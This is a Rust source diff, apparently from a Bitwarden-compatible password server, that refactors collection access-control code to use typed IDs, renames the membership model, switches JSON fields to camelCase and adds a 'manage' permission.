pub user_uuid: UserId,
|
||||||
pub collection_uuid: String,
|
pub collection_uuid: CollectionId,
|
||||||
pub read_only: bool,
|
pub read_only: bool,
|
||||||
pub hide_passwords: bool,
|
pub hide_passwords: bool,
|
||||||
|
pub manage: bool,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Identifiable, Queryable, Insertable)]
|
#[derive(Identifiable, Queryable, Insertable)]
|
||||||
#[diesel(table_name = ciphers_collections)]
|
#[diesel(table_name = ciphers_collections)]
|
||||||
#[diesel(primary_key(cipher_uuid, collection_uuid))]
|
#[diesel(primary_key(cipher_uuid, collection_uuid))]
|
||||||
pub struct CollectionCipher {
|
pub struct CollectionCipher {
|
||||||
pub cipher_uuid: String,
|
pub cipher_uuid: CipherId,
|
||||||
pub collection_uuid: String,
|
pub collection_uuid: CollectionId,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
impl Collection {
|
impl Collection {
|
||||||
pub fn new(org_uuid: String, name: String, external_id: Option<String>) -> Self {
|
pub fn new(org_uuid: OrganizationId, name: String, external_id: Option<String>) -> Self {
|
||||||
let mut new_model = Self {
|
let mut new_model = Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: CollectionId(crate::util::get_uuid()),
|
||||||
org_uuid,
|
org_uuid,
|
||||||
name,
|
name,
|
||||||
external_id: None,
|
external_id: None,
|
||||||
@@ -49,11 +56,11 @@ impl Collection {
|
|||||||
|
|
||||||
pub fn to_json(&self) -> Value {
|
pub fn to_json(&self) -> Value {
|
||||||
json!({
|
json!({
|
||||||
"ExternalId": self.external_id,
|
"externalId": self.external_id,
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"OrganizationId": self.org_uuid,
|
"organizationId": self.org_uuid,
|
||||||
"Name": self.name,
|
"name": self.name,
|
||||||
"Object": "collection",
|
"object": "collection",
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -74,34 +81,66 @@ impl Collection {
|
|||||||
|
|
||||||
pub async fn to_json_details(
|
pub async fn to_json_details(
|
||||||
&self,
|
&self,
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
cipher_sync_data: Option<&crate::api::core::CipherSyncData>,
|
cipher_sync_data: Option<&crate::api::core::CipherSyncData>,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Value {
|
) -> Value {
|
||||||
let (read_only, hide_passwords) = if let Some(cipher_sync_data) = cipher_sync_data {
|
let (read_only, hide_passwords, manage) = if let Some(cipher_sync_data) = cipher_sync_data {
|
||||||
match cipher_sync_data.user_organizations.get(&self.org_uuid) {
|
match cipher_sync_data.members.get(&self.org_uuid) {
|
||||||
Some(uo) if uo.has_full_access() => (false, false),
|
// Only for Manager types Bitwarden returns true for the manage option
|
||||||
Some(_) => {
|
// Owners and Admins always have true. Users are not able to have full access
|
||||||
if let Some(uc) = cipher_sync_data.user_collections.get(&self.uuid) {
|
Some(m) if m.has_full_access() => (false, false, m.atype >= MembershipType::Manager),
|
||||||
(uc.read_only, uc.hide_passwords)
|
Some(m) => {
|
||||||
|
// Only let a manager manage collections when the have full read/write access
|
||||||
|
let is_manager = m.atype == MembershipType::Manager;
|
||||||
|
if let Some(cu) = cipher_sync_data.user_collections.get(&self.uuid) {
|
||||||
|
(
|
||||||
|
cu.read_only,
|
||||||
|
cu.hide_passwords,
|
||||||
|
cu.manage || (is_manager && !cu.read_only && !cu.hide_passwords),
|
||||||
|
)
|
||||||
} else if let Some(cg) = cipher_sync_data.user_collections_groups.get(&self.uuid) {
|
} else if let Some(cg) = cipher_sync_data.user_collections_groups.get(&self.uuid) {
|
||||||
(cg.read_only, cg.hide_passwords)
|
(
|
||||||
|
cg.read_only,
|
||||||
|
cg.hide_passwords,
|
||||||
|
cg.manage || (is_manager && !cg.read_only && !cg.hide_passwords),
|
||||||
|
)
|
||||||
} else {
|
} else {
|
||||||
(false, false)
|
(false, false, false)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
_ => (true, true),
|
_ => (true, true, false),
|
||||||
}
|
}
|
||||||
} else {
|
} else {
|
||||||
(!self.is_writable_by_user(user_uuid, conn).await, self.hide_passwords_for_user(user_uuid, conn).await)
|
match Membership::find_confirmed_by_user_and_org(user_uuid, &self.org_uuid, conn).await {
|
||||||
|
Some(m) if m.has_full_access() => (false, false, m.atype >= MembershipType::Manager),
|
||||||
|
Some(_) if self.is_manageable_by_user(user_uuid, conn).await => (false, false, true),
|
||||||
|
Some(m) => {
|
||||||
|
let is_manager = m.atype == MembershipType::Manager;
|
||||||
|
let read_only = !self.is_writable_by_user(user_uuid, conn).await;
|
||||||
|
let hide_passwords = self.hide_passwords_for_user(user_uuid, conn).await;
|
||||||
|
(read_only, hide_passwords, is_manager && !read_only && !hide_passwords)
|
||||||
|
}
|
||||||
|
_ => (true, true, false),
|
||||||
|
}
|
||||||
};
|
};
|
||||||
|
|
||||||
let mut json_object = self.to_json();
|
let mut json_object = self.to_json();
|
||||||
json_object["Object"] = json!("collectionDetails");
|
json_object["object"] = json!("collectionDetails");
|
||||||
json_object["ReadOnly"] = json!(read_only);
|
json_object["readOnly"] = json!(read_only);
|
||||||
json_object["HidePasswords"] = json!(hide_passwords);
|
json_object["hidePasswords"] = json!(hide_passwords);
|
||||||
|
json_object["manage"] = json!(manage);
|
||||||
json_object
|
json_object
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn can_access_collection(member: &Membership, col_id: &CollectionId, conn: &mut DbConn) -> bool {
|
||||||
|
member.has_status(MembershipStatus::Confirmed)
|
||||||
|
&& (member.has_full_access()
|
||||||
|
|| CollectionUser::has_access_to_collection_by_user(col_id, &member.user_uuid, conn).await
|
||||||
|
|| (CONFIG.org_groups_enabled()
|
||||||
|
&& (GroupUser::has_full_access_by_member(&member.org_uuid, &member.uuid, conn).await
|
||||||
|
|| GroupUser::has_access_to_collection_by_member(col_id, &member.uuid, conn).await)))
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
use crate::db::DbConn;
|
use crate::db::DbConn;
|
||||||
@@ -158,7 +197,7 @@ impl Collection {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_organization(org_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> EmptyResult {
|
||||||
for collection in Self::find_by_organization(org_uuid, conn).await {
|
for collection in Self::find_by_organization(org_uuid, conn).await {
|
||||||
collection.delete(conn).await?;
|
collection.delete(conn).await?;
|
||||||
}
|
}
|
||||||
@@ -166,12 +205,12 @@ impl Collection {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn update_users_revision(&self, conn: &mut DbConn) {
|
pub async fn update_users_revision(&self, conn: &mut DbConn) {
|
||||||
for user_org in UserOrganization::find_by_collection_and_org(&self.uuid, &self.org_uuid, conn).await.iter() {
|
for member in Membership::find_by_collection_and_org(&self.uuid, &self.org_uuid, conn).await.iter() {
|
||||||
User::update_uuid_revision(&user_org.user_uuid, conn).await;
|
User::update_uuid_revision(&member.user_uuid, conn).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid(uuid: &CollectionId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections::table
|
collections::table
|
||||||
.filter(collections::uuid.eq(uuid))
|
.filter(collections::uuid.eq(uuid))
|
||||||
@@ -181,7 +220,7 @@ impl Collection {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user_uuid(user_uuid: String, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_user_uuid(user_uuid: UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
if CONFIG.org_groups_enabled() {
|
if CONFIG.org_groups_enabled() {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections::table
|
collections::table
|
||||||
@@ -207,7 +246,7 @@ impl Collection {
|
|||||||
)
|
)
|
||||||
))
|
))
|
||||||
.filter(
|
.filter(
|
||||||
users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
|
users_organizations::status.eq(MembershipStatus::Confirmed as i32)
|
||||||
)
|
)
|
||||||
.filter(
|
.filter(
|
||||||
users_collections::user_uuid.eq(user_uuid).or( // Directly accessed collection
|
users_collections::user_uuid.eq(user_uuid).or( // Directly accessed collection
|
||||||
@@ -238,7 +277,7 @@ impl Collection {
|
|||||||
)
|
)
|
||||||
))
|
))
|
||||||
.filter(
|
.filter(
|
||||||
users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
|
users_organizations::status.eq(MembershipStatus::Confirmed as i32)
|
||||||
)
|
)
|
||||||
.filter(
|
.filter(
|
||||||
users_collections::user_uuid.eq(user_uuid).or( // Directly accessed collection
|
users_collections::user_uuid.eq(user_uuid).or( // Directly accessed collection
|
||||||
@@ -252,26 +291,19 @@ impl Collection {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// Check if a user has access to a specific collection
|
pub async fn find_by_organization_and_user_uuid(
|
||||||
// FIXME: This needs to be reviewed. The query used by `find_by_user_uuid` could be adjusted to filter when needed.
|
org_uuid: &OrganizationId,
|
||||||
// For now this is a good solution without making to much changes.
|
user_uuid: &UserId,
|
||||||
pub async fn has_access_by_collection_and_user_uuid(
|
|
||||||
collection_uuid: &str,
|
|
||||||
user_uuid: &str,
|
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> bool {
|
) -> Vec<Self> {
|
||||||
Self::find_by_user_uuid(user_uuid.to_owned(), conn).await.into_iter().any(|c| c.uuid == collection_uuid)
|
|
||||||
}
|
|
||||||
|
|
||||||
pub async fn find_by_organization_and_user_uuid(org_uuid: &str, user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
|
||||||
Self::find_by_user_uuid(user_uuid.to_owned(), conn)
|
Self::find_by_user_uuid(user_uuid.to_owned(), conn)
|
||||||
.await
|
.await
|
||||||
.into_iter()
|
.into_iter()
|
||||||
.filter(|c| c.org_uuid == org_uuid)
|
.filter(|c| &c.org_uuid == org_uuid)
|
||||||
.collect()
|
.collect()
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_organization(org_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections::table
|
collections::table
|
||||||
.filter(collections::org_uuid.eq(org_uuid))
|
.filter(collections::org_uuid.eq(org_uuid))
|
||||||
@@ -281,7 +313,7 @@ impl Collection {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn count_by_org(org_uuid: &str, conn: &mut DbConn) -> i64 {
|
pub async fn count_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections::table
|
collections::table
|
||||||
.filter(collections::org_uuid.eq(org_uuid))
|
.filter(collections::org_uuid.eq(org_uuid))
|
||||||
@@ -292,7 +324,11 @@ impl Collection {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid_and_org(uuid: &str, org_uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid_and_org(
|
||||||
|
uuid: &CollectionId,
|
||||||
|
org_uuid: &OrganizationId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections::table
|
collections::table
|
||||||
.filter(collections::uuid.eq(uuid))
|
.filter(collections::uuid.eq(uuid))
|
||||||
@@ -304,7 +340,7 @@ impl Collection {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid_and_user(uuid: &str, user_uuid: String, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid_and_user(uuid: &CollectionId, user_uuid: UserId, conn: &mut DbConn) -> Option<Self> {
|
||||||
if CONFIG.org_groups_enabled() {
|
if CONFIG.org_groups_enabled() {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections::table
|
collections::table
|
||||||
@@ -333,7 +369,7 @@ impl Collection {
|
|||||||
.filter(
|
.filter(
|
||||||
users_collections::collection_uuid.eq(uuid).or( // Directly accessed collection
|
users_collections::collection_uuid.eq(uuid).or( // Directly accessed collection
|
||||||
users_organizations::access_all.eq(true).or( // access_all in Organization
|
users_organizations::access_all.eq(true).or( // access_all in Organization
|
||||||
users_organizations::atype.le(UserOrgType::Admin as i32) // Org admin or owner
|
users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
)).or(
|
)).or(
|
||||||
groups::access_all.eq(true) // access_all in groups
|
groups::access_all.eq(true) // access_all in groups
|
||||||
).or( // access via groups
|
).or( // access via groups
|
||||||
@@ -362,7 +398,7 @@ impl Collection {
|
|||||||
.filter(
|
.filter(
|
||||||
users_collections::collection_uuid.eq(uuid).or( // Directly accessed collection
|
users_collections::collection_uuid.eq(uuid).or( // Directly accessed collection
|
||||||
users_organizations::access_all.eq(true).or( // access_all in Organization
|
users_organizations::access_all.eq(true).or( // access_all in Organization
|
||||||
users_organizations::atype.le(UserOrgType::Admin as i32) // Org admin or owner
|
users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
))
|
))
|
||||||
).select(collections::all_columns)
|
).select(collections::all_columns)
|
||||||
.first::<CollectionDb>(conn).ok()
|
.first::<CollectionDb>(conn).ok()
|
||||||
@@ -371,53 +407,69 @@ impl Collection {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn is_writable_by_user(&self, user_uuid: &str, conn: &mut DbConn) -> bool {
|
pub async fn is_writable_by_user(&self, user_uuid: &UserId, conn: &mut DbConn) -> bool {
|
||||||
let user_uuid = user_uuid.to_string();
|
let user_uuid = user_uuid.to_string();
|
||||||
db_run! { conn: {
|
if CONFIG.org_groups_enabled() {
|
||||||
collections::table
|
db_run! { conn: {
|
||||||
.left_join(users_collections::table.on(
|
collections::table
|
||||||
users_collections::collection_uuid.eq(collections::uuid).and(
|
.filter(collections::uuid.eq(&self.uuid))
|
||||||
users_collections::user_uuid.eq(user_uuid.clone())
|
.inner_join(users_organizations::table.on(
|
||||||
)
|
collections::org_uuid.eq(users_organizations::org_uuid)
|
||||||
))
|
.and(users_organizations::user_uuid.eq(user_uuid.clone()))
|
||||||
.left_join(users_organizations::table.on(
|
))
|
||||||
collections::org_uuid.eq(users_organizations::org_uuid).and(
|
.left_join(users_collections::table.on(
|
||||||
users_organizations::user_uuid.eq(user_uuid)
|
users_collections::collection_uuid.eq(collections::uuid)
|
||||||
)
|
.and(users_collections::user_uuid.eq(user_uuid))
|
||||||
))
|
))
|
||||||
.left_join(groups_users::table.on(
|
.left_join(groups_users::table.on(
|
||||||
groups_users::users_organizations_uuid.eq(users_organizations::uuid)
|
groups_users::users_organizations_uuid.eq(users_organizations::uuid)
|
||||||
))
|
))
|
||||||
.left_join(groups::table.on(
|
.left_join(groups::table.on(
|
||||||
groups::uuid.eq(groups_users::groups_uuid)
|
groups::uuid.eq(groups_users::groups_uuid)
|
||||||
))
|
))
|
||||||
.left_join(collections_groups::table.on(
|
.left_join(collections_groups::table.on(
|
||||||
collections_groups::groups_uuid.eq(groups_users::groups_uuid).and(
|
collections_groups::groups_uuid.eq(groups_users::groups_uuid)
|
||||||
collections_groups::collections_uuid.eq(collections::uuid)
|
.and(collections_groups::collections_uuid.eq(collections::uuid))
|
||||||
)
|
))
|
||||||
))
|
.filter(users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
.filter(collections::uuid.eq(&self.uuid))
|
.or(users_organizations::access_all.eq(true)) // access_all via membership
|
||||||
.filter(
|
.or(users_collections::collection_uuid.eq(&self.uuid) // write access given to collection
|
||||||
users_collections::collection_uuid.eq(&self.uuid).and(users_collections::read_only.eq(false)).or(// Directly accessed collection
|
.and(users_collections::read_only.eq(false)))
|
||||||
users_organizations::access_all.eq(true).or( // access_all in Organization
|
.or(groups::access_all.eq(true)) // access_all via group
|
||||||
users_organizations::atype.le(UserOrgType::Admin as i32) // Org admin or owner
|
.or(collections_groups::collections_uuid.is_not_null() // write access given via group
|
||||||
)).or(
|
.and(collections_groups::read_only.eq(false)))
|
||||||
groups::access_all.eq(true) // access_all in groups
|
|
||||||
).or( // access via groups
|
|
||||||
groups_users::users_organizations_uuid.eq(users_organizations::uuid).and(
|
|
||||||
collections_groups::collections_uuid.is_not_null().and(
|
|
||||||
collections_groups::read_only.eq(false))
|
|
||||||
)
|
)
|
||||||
)
|
.count()
|
||||||
)
|
.first::<i64>(conn)
|
||||||
.count()
|
.ok()
|
||||||
.first::<i64>(conn)
|
.unwrap_or(0) != 0
|
||||||
.ok()
|
}}
|
||||||
.unwrap_or(0) != 0
|
} else {
|
||||||
}}
|
db_run! { conn: {
|
||||||
|
collections::table
|
||||||
|
.filter(collections::uuid.eq(&self.uuid))
|
||||||
|
.inner_join(users_organizations::table.on(
|
||||||
|
collections::org_uuid.eq(users_organizations::org_uuid)
|
||||||
|
.and(users_organizations::user_uuid.eq(user_uuid.clone()))
|
||||||
|
))
|
||||||
|
.left_join(users_collections::table.on(
|
||||||
|
users_collections::collection_uuid.eq(collections::uuid)
|
||||||
|
.and(users_collections::user_uuid.eq(user_uuid))
|
||||||
|
))
|
||||||
|
.filter(users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
|
.or(users_organizations::access_all.eq(true)) // access_all via membership
|
||||||
|
.or(users_collections::collection_uuid.eq(&self.uuid) // write access given to collection
|
||||||
|
.and(users_collections::read_only.eq(false)))
|
||||||
|
)
|
||||||
|
.count()
|
||||||
|
.first::<i64>(conn)
|
||||||
|
.ok()
|
||||||
|
.unwrap_or(0) != 0
|
||||||
|
}}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn hide_passwords_for_user(&self, user_uuid: &str, conn: &mut DbConn) -> bool {
|
pub async fn hide_passwords_for_user(&self, user_uuid: &UserId, conn: &mut DbConn) -> bool {
|
||||||
let user_uuid = user_uuid.to_string();
|
let user_uuid = user_uuid.to_string();
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections::table
|
collections::table
|
||||||
@@ -446,7 +498,7 @@ impl Collection {
|
|||||||
.filter(
|
.filter(
|
||||||
users_collections::collection_uuid.eq(&self.uuid).and(users_collections::hide_passwords.eq(true)).or(// Directly accessed collection
|
users_collections::collection_uuid.eq(&self.uuid).and(users_collections::hide_passwords.eq(true)).or(// Directly accessed collection
|
||||||
users_organizations::access_all.eq(true).or( // access_all in Organization
|
users_organizations::access_all.eq(true).or( // access_all in Organization
|
||||||
users_organizations::atype.le(UserOrgType::Admin as i32) // Org admin or owner
|
users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
)).or(
|
)).or(
|
||||||
groups::access_all.eq(true) // access_all in groups
|
groups::access_all.eq(true) // access_all in groups
|
||||||
).or( // access via groups
|
).or( // access via groups
|
||||||
@@ -462,11 +514,61 @@ impl Collection {
|
|||||||
.unwrap_or(0) != 0
|
.unwrap_or(0) != 0
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn is_manageable_by_user(&self, user_uuid: &UserId, conn: &mut DbConn) -> bool {
|
||||||
|
let user_uuid = user_uuid.to_string();
|
||||||
|
db_run! { conn: {
|
||||||
|
collections::table
|
||||||
|
.left_join(users_collections::table.on(
|
||||||
|
users_collections::collection_uuid.eq(collections::uuid).and(
|
||||||
|
users_collections::user_uuid.eq(user_uuid.clone())
|
||||||
|
)
|
||||||
|
))
|
||||||
|
.left_join(users_organizations::table.on(
|
||||||
|
collections::org_uuid.eq(users_organizations::org_uuid).and(
|
||||||
|
users_organizations::user_uuid.eq(user_uuid)
|
||||||
|
)
|
||||||
|
))
|
||||||
|
.left_join(groups_users::table.on(
|
||||||
|
groups_users::users_organizations_uuid.eq(users_organizations::uuid)
|
||||||
|
))
|
||||||
|
.left_join(groups::table.on(
|
||||||
|
groups::uuid.eq(groups_users::groups_uuid)
|
||||||
|
))
|
||||||
|
.left_join(collections_groups::table.on(
|
||||||
|
collections_groups::groups_uuid.eq(groups_users::groups_uuid).and(
|
||||||
|
collections_groups::collections_uuid.eq(collections::uuid)
|
||||||
|
)
|
||||||
|
))
|
||||||
|
.filter(collections::uuid.eq(&self.uuid))
|
||||||
|
.filter(
|
||||||
|
users_collections::collection_uuid.eq(&self.uuid).and(users_collections::manage.eq(true)).or(// Directly accessed collection
|
||||||
|
users_organizations::access_all.eq(true).or( // access_all in Organization
|
||||||
|
users_organizations::atype.le(MembershipType::Admin as i32) // Org admin or owner
|
||||||
|
)).or(
|
||||||
|
groups::access_all.eq(true) // access_all in groups
|
||||||
|
).or( // access via groups
|
||||||
|
groups_users::users_organizations_uuid.eq(users_organizations::uuid).and(
|
||||||
|
collections_groups::collections_uuid.is_not_null().and(
|
||||||
|
collections_groups::manage.eq(true))
|
||||||
|
)
|
||||||
|
)
|
||||||
|
)
|
||||||
|
.count()
|
||||||
|
.first::<i64>(conn)
|
||||||
|
.ok()
|
||||||
|
.unwrap_or(0) != 0
|
||||||
|
}}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Database methods
|
/// Database methods
|
||||||
impl CollectionUser {
|
impl CollectionUser {
|
||||||
pub async fn find_by_organization_and_user_uuid(org_uuid: &str, user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_organization_and_user_uuid(
|
||||||
|
org_uuid: &OrganizationId,
|
||||||
|
user_uuid: &UserId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.filter(users_collections::user_uuid.eq(user_uuid))
|
.filter(users_collections::user_uuid.eq(user_uuid))
|
||||||
@@ -479,24 +581,30 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_organization(org_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_organization_swap_user_uuid_with_member_uuid(
|
||||||
db_run! { conn: {
|
org_uuid: &OrganizationId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Vec<CollectionMembership> {
|
||||||
|
let col_users = db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.inner_join(collections::table.on(collections::uuid.eq(users_collections::collection_uuid)))
|
.inner_join(collections::table.on(collections::uuid.eq(users_collections::collection_uuid)))
|
||||||
.filter(collections::org_uuid.eq(org_uuid))
|
.filter(collections::org_uuid.eq(org_uuid))
|
||||||
.inner_join(users_organizations::table.on(users_organizations::user_uuid.eq(users_collections::user_uuid)))
|
.inner_join(users_organizations::table.on(users_organizations::user_uuid.eq(users_collections::user_uuid)))
|
||||||
.select((users_organizations::uuid, users_collections::collection_uuid, users_collections::read_only, users_collections::hide_passwords))
|
.filter(users_organizations::org_uuid.eq(org_uuid))
|
||||||
|
.select((users_organizations::uuid, users_collections::collection_uuid, users_collections::read_only, users_collections::hide_passwords, users_collections::manage))
|
||||||
.load::<CollectionUserDb>(conn)
|
.load::<CollectionUserDb>(conn)
|
||||||
.expect("Error loading users_collections")
|
.expect("Error loading users_collections")
|
||||||
.from_db()
|
.from_db()
|
||||||
}}
|
}};
|
||||||
|
col_users.into_iter().map(|c| c.into()).collect()
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn save(
|
pub async fn save(
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
collection_uuid: &str,
|
collection_uuid: &CollectionId,
|
||||||
read_only: bool,
|
read_only: bool,
|
||||||
hide_passwords: bool,
|
hide_passwords: bool,
|
||||||
|
manage: bool,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
User::update_uuid_revision(user_uuid, conn).await;
|
User::update_uuid_revision(user_uuid, conn).await;
|
||||||
@@ -509,6 +617,7 @@ impl CollectionUser {
|
|||||||
users_collections::collection_uuid.eq(collection_uuid),
|
users_collections::collection_uuid.eq(collection_uuid),
|
||||||
users_collections::read_only.eq(read_only),
|
users_collections::read_only.eq(read_only),
|
||||||
users_collections::hide_passwords.eq(hide_passwords),
|
users_collections::hide_passwords.eq(hide_passwords),
|
||||||
|
users_collections::manage.eq(manage),
|
||||||
))
|
))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
{
|
{
|
||||||
@@ -523,6 +632,7 @@ impl CollectionUser {
|
|||||||
users_collections::collection_uuid.eq(collection_uuid),
|
users_collections::collection_uuid.eq(collection_uuid),
|
||||||
users_collections::read_only.eq(read_only),
|
users_collections::read_only.eq(read_only),
|
||||||
users_collections::hide_passwords.eq(hide_passwords),
|
users_collections::hide_passwords.eq(hide_passwords),
|
||||||
|
users_collections::manage.eq(manage),
|
||||||
))
|
))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
.map_res("Error adding user to collection")
|
.map_res("Error adding user to collection")
|
||||||
@@ -537,12 +647,14 @@ impl CollectionUser {
|
|||||||
users_collections::collection_uuid.eq(collection_uuid),
|
users_collections::collection_uuid.eq(collection_uuid),
|
||||||
users_collections::read_only.eq(read_only),
|
users_collections::read_only.eq(read_only),
|
||||||
users_collections::hide_passwords.eq(hide_passwords),
|
users_collections::hide_passwords.eq(hide_passwords),
|
||||||
|
users_collections::manage.eq(manage),
|
||||||
))
|
))
|
||||||
.on_conflict((users_collections::user_uuid, users_collections::collection_uuid))
|
.on_conflict((users_collections::user_uuid, users_collections::collection_uuid))
|
||||||
.do_update()
|
.do_update()
|
||||||
.set((
|
.set((
|
||||||
users_collections::read_only.eq(read_only),
|
users_collections::read_only.eq(read_only),
|
||||||
users_collections::hide_passwords.eq(hide_passwords),
|
users_collections::hide_passwords.eq(hide_passwords),
|
||||||
|
users_collections::manage.eq(manage),
|
||||||
))
|
))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
.map_res("Error adding user to collection")
|
.map_res("Error adding user to collection")
|
||||||
@@ -564,7 +676,7 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_collection(collection_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.filter(users_collections::collection_uuid.eq(collection_uuid))
|
.filter(users_collections::collection_uuid.eq(collection_uuid))
|
||||||
@@ -575,24 +687,27 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_collection_swap_user_uuid_with_org_user_uuid(
|
pub async fn find_by_org_and_coll_swap_user_uuid_with_member_uuid(
|
||||||
collection_uuid: &str,
|
org_uuid: &OrganizationId,
|
||||||
|
collection_uuid: &CollectionId,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Vec<Self> {
|
) -> Vec<CollectionMembership> {
|
||||||
db_run! { conn: {
|
let col_users = db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.filter(users_collections::collection_uuid.eq(collection_uuid))
|
.filter(users_collections::collection_uuid.eq(collection_uuid))
|
||||||
|
.filter(users_organizations::org_uuid.eq(org_uuid))
|
||||||
.inner_join(users_organizations::table.on(users_organizations::user_uuid.eq(users_collections::user_uuid)))
|
.inner_join(users_organizations::table.on(users_organizations::user_uuid.eq(users_collections::user_uuid)))
|
||||||
.select((users_organizations::uuid, users_collections::collection_uuid, users_collections::read_only, users_collections::hide_passwords))
|
.select((users_organizations::uuid, users_collections::collection_uuid, users_collections::read_only, users_collections::hide_passwords, users_collections::manage))
|
||||||
.load::<CollectionUserDb>(conn)
|
.load::<CollectionUserDb>(conn)
|
||||||
.expect("Error loading users_collections")
|
.expect("Error loading users_collections")
|
||||||
.from_db()
|
.from_db()
|
||||||
}}
|
}};
|
||||||
|
col_users.into_iter().map(|c| c.into()).collect()
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_collection_and_user(
|
pub async fn find_by_collection_and_user(
|
||||||
collection_uuid: &str,
|
collection_uuid: &CollectionId,
|
||||||
user_uuid: &str,
|
user_uuid: &UserId,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Option<Self> {
|
) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
@@ -606,7 +721,7 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
users_collections::table
|
users_collections::table
|
||||||
.filter(users_collections::user_uuid.eq(user_uuid))
|
.filter(users_collections::user_uuid.eq(user_uuid))
|
||||||
@@ -617,7 +732,7 @@ impl CollectionUser {
|
